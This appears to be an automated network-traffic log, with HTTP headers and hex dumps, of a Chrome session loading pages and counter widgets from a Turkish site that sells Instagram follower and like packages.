                    2024-05-26 22:57:54 UTC1369INData Raw: 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e 20 2c 20 c4
                    Data Ascii: yle/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin ,
                    2024-05-26 22:57:54 UTC1369INData Raw: 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61 76
                    Data Ascii: apse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav nav
                    2024-05-26 22:57:54 UTC1369INData Raw: 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f
                    Data Ascii: Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class="co


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.549792104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:54 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:54 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1454.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15ded68585e79-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:54 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.549793104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:54 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:54 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:57:54 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/57.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15dee0a67c35a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:54 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.549794104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:55 UTC589OUTGET /classic/00/57.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:55 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:55 GMT
                    Content-Type: image/png
                    Content-Length: 1493
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5d5"
                    expires: Wed, 15 May 2024 16:11:59 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1061156
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15df2ed710f75-EWR
                    2024-05-26 22:57:55 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 bb 50 4c 54 45 ff ff ff 8e 8e 8e 90 90 90 c8 c8 c8 e4 e4 e4 a5 a5 a5 e9 e9 e9 bf bf bf bc bc bc d2 d2 d2 8d 8d 8d 8b 8b 8b 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W
                    2024-05-26 22:57:55 UTC556INData Raw: 01 75 36 89 ad b9 fc 0b fb fa 7d 2b b3 92 ce 82 84 d8 08 7b 10 0a 83 7c 78 9a 48 b2 3c 1e 01 4d bc d5 6a 5d b4 f9 0f ed b9 d5 4a 97 a5 17 ad 5c 81 70 b8 40 20 08 c0 29 40 40 13 c2 9e 4e 3d b4 82 7a 04 a2 ab b5 46 e3 bb bf b4 c3 47 5f ec 60 c2 c9 29 46 0e 7f e8 ef b0 ef 01 b9 1d ac 4c 35 7e 46 75 92 69 7e 0b ed bd c9 64 ba c0 a4 96 75 26 0e 3f e8 e7 b0 ef de 8d db c1 9a 80 9f b1 38 3b cf f2 b9 01 5b 69 79 68 b1 b0 b1 e1 91 85 c3 17 0e 1b 3a c4 f7 bf ad 2f b7 83 25 97 23 40 25 51 a5 7b 9a b0 d4 94 54 8a 5a bc 7f 19 9d 9b 52 28 47 d1 90 36 d8 be ed da 85 e2 a5 28 3d 86 80 a5 4a 59 fa aa 11 2b 89 2b 11 95 34 c6 89 66 d0 9b 13 3c 57 81 8f 37 1c 64 4b d0 9b f7 b2 90 5b 94 15 08 14 a8 08 49 33 ed ec 6a ad 76 7b 73 f3 e9 0d f4 66 a1 96 cf c0 01 6c ed 0c 23 f9 8e
                    Data Ascii: u6}+{|xH<Mj]J\p@ )@@N=zFG_`)FL5~Fui~du&?8;[iyh:/%#@%Q{TZR(G6(=JY++4f<W7dK[I3jv{sfl#


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.549796104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:56 UTC357OUTGET /classic/00/57.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:56 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:56 GMT
                    Content-Type: image/png
                    Content-Length: 1493
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:09 GMT
                    etag: "4c149ecd-5d5"
                    expires: Wed, 15 May 2024 16:11:59 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1061157
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15df80d8c439c-EWR
                    2024-05-26 22:57:56 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 bb 50 4c 54 45 ff ff ff 8e 8e 8e 90 90 90 c8 c8 c8 e4 e4 e4 a5 a5 a5 e9 e9 e9 bf bf bf bc bc bc d2 d2 d2 8d 8d 8d 8b 8b 8b 72 72 72 c6 c6 c6 e2 e2 e2 c7 c7 c7 ac ac ac e3 e3 e3 93 93 93 c9 c9 c9 bb bb bb e8 e8 e8 99 99 99 ad ad ad 70 70 70 d4 d4 d4 92 92 92 a8 a8 a8 be be be 7d 7d 7d 7a 7a 7a 77 77 77 a2 a2 a2 b9 b9 b9 d0 d0 d0 74 74 74 b7 b7 b7 e7 e7 e7 cf cf cf ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f 37 3b 52 4a 4a 8c 23 27 b6 26 2b 5b 21 24 a4 5c 5f b7 26 2c 53 19 1b 32 1f 20 9a 27 2b 57
                    Data Ascii: PNGIHDRQpPLTErrrppp}}}zzzwwwttt\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;7;RJJ#'&+[!$\_&,S2 '+W
                    2024-05-26 22:57:56 UTC556INData Raw: 01 75 36 89 ad b9 fc 0b fb fa 7d 2b b3 92 ce 82 84 d8 08 7b 10 0a 83 7c 78 9a 48 b2 3c 1e 01 4d bc d5 6a 5d b4 f9 0f ed b9 d5 4a 97 a5 17 ad 5c 81 70 b8 40 20 08 c0 29 40 40 13 c2 9e 4e 3d b4 82 7a 04 a2 ab b5 46 e3 bb bf b4 c3 47 5f ec 60 c2 c9 29 46 0e 7f e8 ef b0 ef 01 b9 1d ac 4c 35 7e 46 75 92 69 7e 0b ed bd c9 64 ba c0 a4 96 75 26 0e 3f e8 e7 b0 ef de 8d db c1 9a 80 9f b1 38 3b cf f2 b9 01 5b 69 79 68 b1 b0 b1 e1 91 85 c3 17 0e 1b 3a c4 f7 bf ad 2f b7 83 25 97 23 40 25 51 a5 7b 9a b0 d4 94 54 8a 5a bc 7f 19 9d 9b 52 28 47 d1 90 36 d8 be ed da 85 e2 a5 28 3d 86 80 a5 4a 59 fa aa 11 2b 89 2b 11 95 34 c6 89 66 d0 9b 13 3c 57 81 8f 37 1c 64 4b d0 9b f7 b2 90 5b 94 15 08 14 a8 08 49 33 ed ec 6a ad 76 7b 73 f3 e9 0d f4 66 a1 96 cf c0 01 6c ed 0c 23 f9 8e
                    Data Ascii: u6}+{|xH<Mj]J\p@ )@@N=zFG_`)FL5~Fui~du&?8;[iyh:/%#@%Q{TZR(G6(=JY++4f<W7dK[I3jv{sfl#


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.549797104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:57 UTC839OUTGET /packages HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.0.1716764274.0.0.0; _ga=GA1.1.1095029423.1716764258
                    2024-05-26 22:57:57 UTC738INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:57 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mhd%2Fl2ntY%2BxfvjEcpggHkLxPJB2fR16HsRDfnW6mPhe23wFf%2BJVNi1iT1nINq6ZWqE5Y2TKFC1AXuFByvXeK10LmZrDLiN2WiZ0enR7H0FWzfp%2FeDW%2FzPHrzdtLv9aE%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15dfebb2f8c78-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:57 UTC631INData Raw: 34 35 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 4597<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:57:57 UTC1369INData Raw: 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 49 6e 73 74 61 67 72 61 6d 20 54 61 6b 69 70 c3 a7 69 2c 20 42 65 c4 9f 65 6e 69 20 76 65 20 4f 74 6f 20 42 65 c4 9f 65 6e 69 20 50 61 6b 65 74 6c 65 72 69 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61
                    Data Ascii: yle/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Instagram Takipi, Beeni ve Oto Beeni Paketleri | AnaTakip kendinizi insta
                    2024-05-26 22:57:57 UTC1369INData Raw: 67 6f 2f 6c 6f 67 6f 2e 70 6e 67 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 68 65 61 64 65 72 20 70 75 6c 6c 2d 72 69 67 68 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61 76 62 61 72 2d 6e 61 76 20 70 75 6c 6c 2d 6c 65 66 74 22 3e 0a 3c 6c 69 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 74 6e 22 3e 0a 3c 61 20 69 64 3d 22 6c 6f 67 69 6e 41 73 55 73 65 72 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 22 3e 0a 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 69 67 6e 2d 69 6e 22 3e 3c 2f 69 3e 0a 47 c4 b0 52 c4 b0 c5 9e 0a 3c 2f 61 3e 0a 3c 2f 70 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 62
                    Data Ascii: go/logo.png" /></a></div><div class="navbar-header pull-right"><ul class="nav navbar-nav pull-left"><li><p class="navbar-btn"><a id="loginAsUser" class="btn btn-primary" href="/login"><i class="fa fa-sign-in"></i>GR</a></p></li></ul><b
                    2024-05-26 22:57:57 UTC1369INData Raw: 6c 61 72 c4 b1 6e 20 68 6f c5 9f 75 6e 61 20 67 69 64 65 63 65 6b 20 70 61 79 6c 61 c5 9f c4 b1 6d 6c 61 72 20 79 61 70 61 6e 20 73 61 79 66 61 6c 61 72 c4 b1 6e c4 b1 7a 61 20 74 61 6b 69 70 c3 a7 69 20 c3 a7 65 6b 6d 65 6b 74 69 72 2e 3c 62 72 2f 3e 0a 3c 73 74 72 6f 6e 67 3e c4 b0 6c 65 74 69 c5 9f 69 6d 2f 57 68 61 74 73 61 70 70 3a 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 68 61 74 73 61 70 70 2e 63 6f 6d 2f 73 65 6e 64 3f 70 68 6f 6e 65 3d 39 30 35 34 34 39 36 31 32 30 35 32 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 30 20 28 35 34 34 29 20 39 36 31 26 6e 62 73 70 3b 32 30 26 6e 62 73 70 3b 35 32 3c 2f 61 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 6b 65
                    Data Ascii: larn houna gidecek paylamlar yapan sayfalarnza takipi ekmektir.<br/><strong>letiim/Whatsapp:&nbsp;<a href="https://api.whatsapp.com/send?phone=905449612052" target="_blank">0 (544) 961&nbsp;20&nbsp;52</a></strong></p><div class="pake
                    2024-05-26 22:57:57 UTC1369INData Raw: 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 20 31 70 78 20 31 70 78 20 34 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 3b 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 32 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 35 30 25 20 63 65 6e 74 65 72 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70
                    Data Ascii: sition: all 0.4s ease 0s; box-shadow: rgba(0, 0, 0, 0.4) 1px 1px 4px; margin-bottom: 0px; touch-action: manipulation; cursor: pointer; background-image: none; white-space: nowrap; background-size: 200%; background-position: 50% center; text-transform: upp
                    2024-05-26 22:57:57 UTC1369INData Raw: 2e 63 6f 6d 2f 33 35 33 32 36 39 34 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 34 35 35 2c 20 31 30 35 2c 20 30 35 29 3b 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 69 6e 69 74 69 61 6c 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 69 6e 69 74 69 61 6c 3b 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 34 36 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 34 73 20 65 61 73 65 20 30 73 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30
                    Data Ascii: .com/3532694" style="background-color: rgb(455, 105, 05); border-width: initial; border-style: none; border-color: initial; padding: 6px 10px; font-size: 10px; line-height: 1.846; border-radius: 10px; transition: all 0.4s ease 0s; box-shadow: rgba(0, 0, 0
                    2024-05-26 22:57:57 UTC1369INData Raw: 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6e 6f 6e 65 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 32 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 35 30 25 20 63 65 6e 74 65 72 3b 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 48 41 56 41 4c 45 2f 45 46 54 20 c4 b0 4c 45 20 53 41 54 49 4e 20 41 4c 3c 2f 61 3e 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 6e 66 6f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 69 65 72 2e 63 6f 6d 2f 33 35 33 34 35 34 39 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                    Data Ascii: r; background-image: none; white-space: nowrap; background-size: 200%; background-position: 50% center; text-transform: uppercase;" target="_blank">HAVALE/EFT LE SATIN AL</a><a class="btn btn-info" href="https://shopier.com/3534549" style="background-co
